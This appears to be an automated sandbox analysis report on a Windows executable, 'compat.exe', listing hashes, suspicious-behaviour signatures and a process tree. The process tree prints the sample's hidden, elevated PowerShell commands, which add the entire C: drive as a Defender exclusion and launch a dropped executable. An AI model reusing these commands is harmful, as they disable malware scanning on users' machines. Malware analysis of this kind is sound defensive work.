c1b148bc680a5632b635daf0a25997d9b3addba6e745370ba19298ff365859c1

Analysis

max time kernel
60s
max time network
147s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
09/10/2022, 06:40

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

compat.exe
Size

2.3MB
MD5

762cb6a485d80bb9bfe03b41dea15d0c
SHA1

82bfac0067037ff3bd4e01cc1f3a9b38eea0762f
SHA256

c8be9798b47ba613eac093efd3d045c99aad97bd255172ac2e59687db71ad25f
SHA512

b08180f85f0945572e2ce426caa7c7848bc79c8b80424d207bec9b340826d0f9b5622472f53faba53126d4e4d2198586c135393c574064588d9a38169e500cac
SSDEEP

49152:DiubKxC3aujrb/ThvO90d7HjmAFd4A64nsfJ5y4gXG/jpCF11z1:13LwA

Score

1^/10

Malware Config

Signatures

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
3068	powershell.exe
3068	powershell.exe
4840	powershell.exe
4840	powershell.exe
1328	powershell.exe
1328	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	3068	powershell.exe
Token: SeDebugPrivilege	4840	powershell.exe
Token: SeDebugPrivilege	1328	powershell.exe

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 5104 wrote to memory of 3068	5104	compat.exe	81
PID 5104 wrote to memory of 3068	5104	compat.exe	81
PID 3068 wrote to memory of 4924	3068	powershell.exe	83
PID 3068 wrote to memory of 4924	3068	powershell.exe	83
PID 4924 wrote to memory of 4840	4924	cmd.exe	85
PID 4924 wrote to memory of 4840	4924	cmd.exe	85
PID 4924 wrote to memory of 384	4924	cmd.exe	88
PID 4924 wrote to memory of 384	4924	cmd.exe	88
PID 5104 wrote to memory of 1328	5104	compat.exe	90
PID 5104 wrote to memory of 1328	5104	compat.exe	90
PID 1328 wrote to memory of 3964	1328	powershell.exe	92
PID 1328 wrote to memory of 3964	1328	powershell.exe	92

C:\Users\Admin\AppData\Local\Temp\compat.exe
"C:\Users\Admin\AppData\Local\Temp\compat.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:5104
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe "Start-Process cmd \\\"/k powershell Add-MpPreference -ExclusionPath 'C:\' & fsutil file createnew %AppData%\\excluded.txt 1\" -Verb RunAs -WindowStyle hidden -ErrorAction SilentlyContinue"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3068
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" \/k powershell Add-MpPreference -ExclusionPath 'C:\' & fsutil file createnew %AppData%\\excluded.txt 1
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4924
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Add-MpPreference -ExclusionPath 'C:\'
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4840
  - - C:\Windows\system32\fsutil.exe
      fsutil file createnew C:\Users\Admin\AppData\Roaming\\excluded.txt 1
      4⤵
      PID:384
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe "Start-Process cmd \\\"/k start %AppData%\\test.exe\" -WindowStyle hidden"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1328
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" \/k start %AppData%\\test.exe
    3⤵
    PID:3964

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
6cf293cb4d80be23433eecf74ddb5503

SHA1
24fe4752df102c2ef492954d6b046cb5512ad408

SHA256
b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

SHA512
0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
50a8221b93fbd2628ac460dd408a9fc1

SHA1
7e99fe16a9b14079b6f0316c37cc473e1f83a7e6

SHA256
46e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e

SHA512
27dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
96ff1ee586a153b4e7ce8661cabc0442

SHA1
140d4ff1840cb40601489f3826954386af612136

SHA256
0673399a2f37c89d455e8658c4d30b9248bff1ea47ba40957588e2bc862976e8

SHA512
3404370d0edb4ead4874ce68525dc9bcbc6008003682646e331bf43a06a24a467ace7eff5be701a822d74c7e065d0f6a0ba0e3d6bc505d34d0189373dcacb569

Download Submit
memory/1328-145-0x00007FFDCE410000-0x00007FFDCEED1000-memory.dmp

Filesize
10.8MB

Download
memory/1328-142-0x00007FFDCE410000-0x00007FFDCEED1000-memory.dmp

Filesize
10.8MB

Download
memory/3068-133-0x000001C621670000-0x000001C621692000-memory.dmp

Filesize
136KB

Download
memory/3068-146-0x00007FFDCE760000-0x00007FFDCF221000-memory.dmp

Filesize
10.8MB

Download
memory/3068-135-0x00007FFDCE760000-0x00007FFDCF221000-memory.dmp

Filesize
10.8MB

Download
memory/4840-139-0x00007FFDCE760000-0x00007FFDCF221000-memory.dmp

Filesize
10.8MB

Download
memory/4840-147-0x00007FFDCE760000-0x00007FFDCF221000-memory.dmp

Filesize
10.8MB

Download